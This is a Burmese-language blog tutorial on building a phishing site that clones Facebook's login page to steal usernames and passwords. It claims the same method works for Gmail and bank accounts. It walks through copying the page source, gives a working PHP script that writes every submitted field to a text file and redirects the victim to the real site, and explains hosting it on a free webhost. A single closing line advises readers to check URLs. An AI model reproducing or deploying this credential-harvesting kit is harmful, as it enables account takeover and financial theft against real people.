How to made Phishing Attack (Phishing Attack နွင္႕ Facebook ,Gmail,Bank Account ႏွင္႕Other Email မ်ား hack နည္း)

Phishing Attack ဘယ္လိုလုပ္ရမလညး္မေရး ခင္ phishing attack ကဘယ္လုိအလုပ္လုပ္သလဲေျပာျပပါမယ္။ တစ္ကယ္ေတာ႕လြယ္လြယ္ ေျပာရရင္ phishing attack ဆိုတာ ကိုတိုက္မယ္႕ဆိုက္ကိုClone လိုက္ျပီး user ရဲ႕ information ကို database or log ထဲျကားျဖတ္ယူလိုက္တာပါ။က်ြန္ေတာ္ခု နမူနာအေနနဲ႕ facebook ကို phishing page တစ္ခုလုပ္ျပပါမယ္။က်န္တဲ႕ ဆိုဒ္ေတြကို လုုပ္လညး္သေဘာတရားကတူတူပါဘဲ။ facebook နဲ႕ gmail တြက္ကေတာ႕ online ေပါၤ မွာ တျခား tutorial ေတြလညး္ပလူပ်ံေအာင္ ရွိပါတယ္။ ဒါပင္မယ္္ တျခားဟာေတြလုပ္ဖို႕ကေတာ႕ သင္႕ဆီမွာ SQL language and database နဲ႕ php language ကိုသိထားဖုိ႕ေတာ႕လိုပါလိပ္မယ္။

ခု facebook ကိုစလုပ္ပါမယ္ ။

ပထမဦးဆံုး သင္႕ computer ရဲ႕ browser တစ္ခုခု eg.firefox ကေန www.facebook.com ကို

ေခၚလိုက္ပါ။

                                          

အဆင္႕ ၂ အေနနဲ႕ က်လာတဲ႕ facebook log in page မွာ right click ေထာက္ျပီး View Page Source ဆိုတာကိုနွိပ္လုိက္ပါ။

အဆင္႕ ၃ က သင္ view page source ဆိုတာကိုနွိပ္လိုက္ရင္ html code ေတြနဲ႕ page တစ္ခုေပၚလာပါလိပ္မယ္။ထုိ html code ေတြကို select all နဲ႕ copy ကူးျပီး notepad အလြတ္တစ္ခုထဲ paste ခ်လိုက္ပါ။

         

အဆင္႕ ၄ ထုိ notepad ကို index.html  အေနနဲ႕ save လုပ္လိုက္ပါ။

အဆင္႕ ၅ notepad အလြတ္တစ္ခုထဲေအာက္က php code ေတြကို post.php နာမ္မည္နဲ႕ save လုပ္လိုက္ပါ။

<?php

header ('Location:http://www.facebook.com');

$handle = fopen("usernames.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);   exit;   ?>

အဆင္႕ ၆ free ရတဲ႕ webhosting တစ္ခုခုကိုသြားျပီးအေကာင္႕တစ္ခုဖြင္႕ပါ။ eg.www.000webhost.com  (free ရတဲ႕ web host ေတြအမ်ားျကီးရွိပါတယ္ ဒါပင္မယ္႕ php နဲ႕ sql ကို support လုပ္ဖို႕ေတာ႕လိုတယ္။က်ြန္ေတာ္က ေတာ႕ 000webhost ကိုသံုးတယ္ သူက domain ပါ တစ္ခါတည္းအလကားရတယ္။ တစ္ခ်ိဳ႕ host ေတြက domain ကိုသပ္သပ္ေလ်ွာက္ျပီး ျပန္တြဲေပးရတယ္။

အဆင္ (၇)

သင္႕မွာ web hoshing တစ္ခုပိုင္ဆိုင္သြားျပီဆိုရင္ သင္႕ web hosing မွ C panel ထဲက MY Sql ကိုသြားျပီး table တစ္ခုတည္ေဆာက္လုိက္ပါ။

အဆင္႕(၈)

သင္႕ရဲ႕ C Panel ထဲ႕က file Manager ေအာက္က Publish_Html file ေအာက္ကို က်ြန္ေတာ္တို႕လုပ္ထားတဲ႕ index.htm ဖိုင္ရယ္ post.php ရယ္ username.txt ကို upload တင္လိုက္ပါ။

Final အေနနဲ႕က ေတာ႕ သင္႕ web hosting ေလ်ာက္တုန္းက ရတဲ႕ domain ကို ေခၚျကည္႕လိုက္ပါ။ facebook book page နဲ႕တစ္ပံုတည္းတူတဲ႕ Pageက်လာပါလိပ္မယ္အဲ႕ထဲကေန facebook ကို Login ၀င္မိတဲ႕သူရဲ႕user name နဲ႕ password ကေတာ႕ သင္႕ရဲ႕ username.txt ထဲမွာေရာက္ေနပါလိမ္မယ္။ဒါက facebook ကို နမူနာေျပာျပတာပါ။ က်န္တဲ႕ Email,Banking အေကာင္႕ေတြကိုထို႕အတူလုပ္လို႕ရပါတယ္။ဒါပင္မယ္

တျခားဟာေတြလုပ္ဖို႕တြက္ကေတာ႕ သင္႕ရဲ႕ programming skill ေပၚမွာမူတည္ပါလိမ္႕မယ္။

ဒါေျကာင္႕ phishing attack မလုပ္ခံရဖို႕တြက္ login တစ္ခု၀င္ေတာ႕မယ္ဆို URL ကိုေသခ်ာစစ္ပါလို႕ေျပာခ်င္ပါတယ္။လိုအပ္တာရွိရင္၀င္ေရာက္ျပင္ဆင္ေပးျကပါလို႕။

ပံုႏွင္႕တကြPDF ကို download လုပ္နိုင္ပါသည္။

                                                                                                                                                                                                                                                                                                                                                                                                                                                                           အာလံုးကိုေလးစားလ်က္

                                                                                        Saw Htet or Saw Browser